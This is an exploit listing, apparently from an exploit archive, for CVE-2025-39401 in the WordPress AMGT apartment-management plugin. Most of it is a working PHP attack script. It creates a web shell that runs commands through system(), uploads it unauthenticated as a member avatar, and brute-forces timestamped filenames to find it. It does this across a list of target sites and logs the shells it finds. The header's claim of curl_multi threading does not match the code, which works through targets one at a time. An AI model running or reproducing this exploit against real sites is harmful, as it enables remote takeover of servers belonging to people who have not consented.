## https://sploitus.com/exploit?id=PACKETSTORM:216523
=============================================================================================================================================
| # Title : WordPress AMGT 44.0 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.com/plugins/browse/apartment-management |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212164/ & CVE-2025-39401
[+] Summary : A vulnerability in the AMGT membership registration form allows an attacker to upload arbitrary files via the "amgt_user_avatar" parameter. The uploaded
file is stored with a timestamp-based filename that can be guessed, allowing remote code execution. – PHP Multi‑Target PoC
[+] Affected :
Any WordPress installation running AMGT plugin.
[+] Impact :
Full Remote Code Execution (RCE) in the server’s context.
[+] Requirements :
No authentication required.
[+] Notes :
This PHP PoC supports :
- Multi-threading simulation using curl_multi
- Timestamp brute forcing
- Cross‑platform compatibility (Linux/Windows/macOS/BSD)
- Custom markers to validate shell execution
- Randomized payload and alternative bypass strategies
[+] Usage :
See instructions at the bottom of this report.
[+] POC :
<?php
/**
*by Indoushka (Nekaa Salah eddine)
*/
error_reporting(0); // Hides every warning/notice, including failed file and curl calls further down.
$USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"; // Fixed UA sent on every request (a stable fingerprint in server logs).
$SUCCESS_FILE = "success_results.txt"; // Local log, one "<target> | <shell url>" line per confirmed hit.
$UPLOADED_FILE = "uploaded_shells.txt"; // Local log, shell URL only.
$SHELL_LOCAL_FILE = "shell.php"; // Local file sent as the avatar; created from $default_shell_payload when absent.
$INITIAL_SLEEP = 5; // Seconds to wait after the upload POST before the first probe.
$RETRIES = 8; // Number of probe rounds in exploit_target().
$BETWEEN_RETRIES = 4; // Seconds between probe rounds.
$WINDOW = 5; // Each round probes timestamps from ts-WINDOW to ts+WINDOW.
/* ------------------------- SHELL PAYLOAD ------------------------------ */
/* Web shell body: prints the marker string, then runs the "cmd" query parameter through system(). */
$default_shell_payload = <<<PAYLOAD
<?php
echo "<b>Indoushka_RCE</b>\\n";
system(\$_GET['cmd']);
?>
PAYLOAD;
/* Writes the web shell into the current working directory if shell.php is not already there. */
if (!file_exists($SHELL_LOCAL_FILE)) {
file_put_contents($SHELL_LOCAL_FILE, $default_shell_payload);
}
/* ---------------------- HELPERS ------------------------- */
function write_result($file, $value) {
    // Append $value as its own line to $file (created on first write).
    $line = $value . PHP_EOL;
    file_put_contents($file, $line, FILE_APPEND);
}
function generate_filename($original, $ts, $mark = "pimg") {
    // Builds "<ts>-<mark>-in.<ext>", keeping the extension of the local file.
    $extension = pathinfo($original, PATHINFO_EXTENSION);
    $parts = [$ts, $mark, "in.{$extension}"];
    return implode('-', $parts);
}
function http_post($url, $fields, $files, $ua) {
    // Multipart POST: plain form fields and CURLFile entries go into one body.
    // Certificate verification is switched off, so any TLS endpoint is accepted.
    $handle = curl_init();
    $options = [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_USERAGENT => $ua,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => array_merge($fields, $files),
        CURLOPT_TIMEOUT => 30,
    ];
    curl_setopt_array($handle, $options);
    $responseBody = curl_exec($handle);
    $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    curl_close($handle);
    // $responseBody is false when the transfer itself failed; $httpCode is then 0.
    return [$httpCode, $responseBody];
}
function http_get($url, $ua) {
    // Plain GET with the body returned instead of echoed.
    // Certificate verification is switched off, so any TLS endpoint is accepted.
    $handle = curl_init();
    $options = [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_USERAGENT => $ua,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_TIMEOUT => 20,
    ];
    curl_setopt_array($handle, $options);
    $responseBody = curl_exec($handle);
    $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    curl_close($handle);
    // $responseBody is false when the transfer itself failed; $httpCode is then 0.
    return [$httpCode, $responseBody];
}
/* ------------------- EXPLOIT FUNCTION --------------------- */
/**
 * Submits the member-registration form of one site with shell.php in the
 * "amgt_user_avatar" file field, then probes the uploads directory for the
 * timestamp-named copy and records its URL once the response contains $marker.
 *
 * Reads the configuration globals declared at the top of the file.
 *
 * @param string $target_url site base URL, trailing slash optional
 * @param string $marker     substring expected in the shell's output; used as proof of execution
 * @return void  results go to stdout and to $SUCCESS_FILE / $UPLOADED_FILE
 */
function exploit_target($target_url, $marker) {
global $USER_AGENT,
$SHELL_LOCAL_FILE, $SUCCESS_FILE, $UPLOADED_FILE,
$INITIAL_SLEEP, $RETRIES, $BETWEEN_RETRIES, $WINDOW;
if (!file_exists($SHELL_LOCAL_FILE)) {
echo "[ERROR] Missing shell file.\n";
return;
}
// Local clock at upload time; the probe window below is centred on it
// (presumably because the server names the file from its own clock — not verifiable here).
$ts = time();
// Timestamped so each run registers a distinct address.
$email = "indoushka_{$ts}@exploit.com";
echo "\n[+] Uploading shell to: $target_url\n";
// Registration page of the plugin; no cookie or credential is sent with this request.
$upload_url = rtrim($target_url, "/") . "/apartment-management-member-registration-page/";
// Minimal registration form values; only the email varies per run.
$fields = [
"building_id" => "1",
"unit_cat_id" => "2",
"unit_name" => "Unit-X",
"member_type" => "Owner",
"first_name" => "Indo",
"last_name" => "Ushka",
"gender" => "male",
"birth_date" => "1990-01-01",
"mobile" => "99887766",
"email" => $email,
"password" => "Indo1337!",
"registration_front_member" => "1"
];
// The PHP file is sent in the avatar image field.
$files = [
"amgt_user_avatar" => new CURLFile($SHELL_LOCAL_FILE)
];
// Status and body of the upload response are discarded; success is decided only by the probes below.
http_post($upload_url, $fields, $files, $USER_AGENT);
echo "[+] Uploaded. Sleeping {$INITIAL_SLEEP}s...\n";
sleep($INITIAL_SLEEP);
echo "[+] Brute-forcing timestamp window...\n";
// Each round probes 2*$WINDOW+1 candidate names and shifts the window forward by $attempt seconds.
// Server-side this appears as a burst of GETs for
// /wp-content/uploads/apartment_assets/<unix-ts>-pimg-in.php, mostly 404s — a distinctive log pattern.
for ($attempt = 0; $attempt < $RETRIES; $attempt++) {
for ($d = -$WINDOW; $d <= $WINDOW; $d++) {
$guess = $ts + $d + $attempt;
$name = generate_filename($SHELL_LOCAL_FILE, $guess);
$shell_url = rtrim($target_url, "/") . "/wp-content/uploads/apartment_assets/" . $name;
list($code, $body) = http_get($shell_url, $USER_AGENT);
// A 200 alone is not enough: the body must carry the marker the payload echoes.
if ($code == 200 && strpos($body, $marker) !== false) {
echo "[✓] SHELL FOUND: $shell_url\n";
write_result($SUCCESS_FILE, "$target_url | $shell_url");
write_result($UPLOADED_FILE, $shell_url);
return;
}
echo "[x] $code → $shell_url\n";
}
sleep($BETWEEN_RETRIES);
}
echo "[✗] Not found.\n";
}
/* ------------------ MAIN ------------------ */
echo "\n=== AMGT PHP Exploit by Indoushka ===\n";
// Path to a newline-separated list of site base URLs.
$list = readline("Enter targets file (e.g., list.txt): ");
$marker = readline("Enter shell marker (default: Indoushka_RCE): ");
// Empty input falls back to the string the bundled payload echoes (note: "0" is also treated as empty).
if (!$marker) $marker = "Indoushka_RCE";
// file() returns false for an unreadable path; the warning is hidden by error_reporting(0)
// and the foreach below then runs zero times, so "Done." is printed without any work.
$targets = file($list, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) {
// Targets are processed one at a time, sequentially.
exploit_target(trim($t), $marker);
}
echo "\nDone. Results saved.\n";
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================